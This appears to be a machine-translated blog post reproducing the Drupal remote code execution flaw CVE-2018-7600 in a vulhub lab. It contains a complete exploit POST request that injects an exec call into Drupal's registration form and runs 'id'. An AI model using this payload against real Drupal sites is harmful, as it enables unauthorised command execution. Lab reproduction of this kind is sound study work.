Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to reproduce the Drupal remote code execution vulnerability CVE-2018-7600. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Drupal is an open source content management framework (CMF) written in PHP. It is composed of a content management system and a PHP development framework, and is released under GPL2.0 and update protocols. Won the global best CMS award for many years in a row, it is the most famous WEB application based on the PHP language.

On March 28, 2018, Drupal Security Team officially announced that there is a remote code execution vulnerability in several sub-versions, including Drupal 6, 7 and 8, which can be exploited by attackers to execute malicious code.

Drupal does not strictly filter form request data, allowing attackers to inject malicious code into form content, a vulnerability that allows unauthenticated attackers to execute remote code execution on default or common Drupal installations.

Scope of influence: Drupal 6, 7, 8 and other sub-versions

The following is only for vulnerability recurrence record and implementation, and the utilization process is as follows:

I. loophole environment

The demonstration environment is built with vulhub, and the following command is executed.

Cd / drupal/CVE-2018-7600 /

Docker-compose up-d

Choose English language, Chinese installation may report errors, database select sqlite database, and then everything else will be fine by default.

Vulnerability link: http://192.168.101.152:8080/

It looks like this after the interview.

Second, vulnerability exploitation

You can execute the command by sending the following packet directly.

POST / user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1

Host: 192.168.101.152:8080

Content-Type: application/x-www-form-urlencoded

Content-Length: 103

Form_id=user_register_form&_drupal_ajax=1&mail [# post_render] [] = exec&mail [# type] = markup&mail [# markup] = id

Command executed successfully

The above is the reproduction of the Drupal remote code execution vulnerability CVE-2018-7600 shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.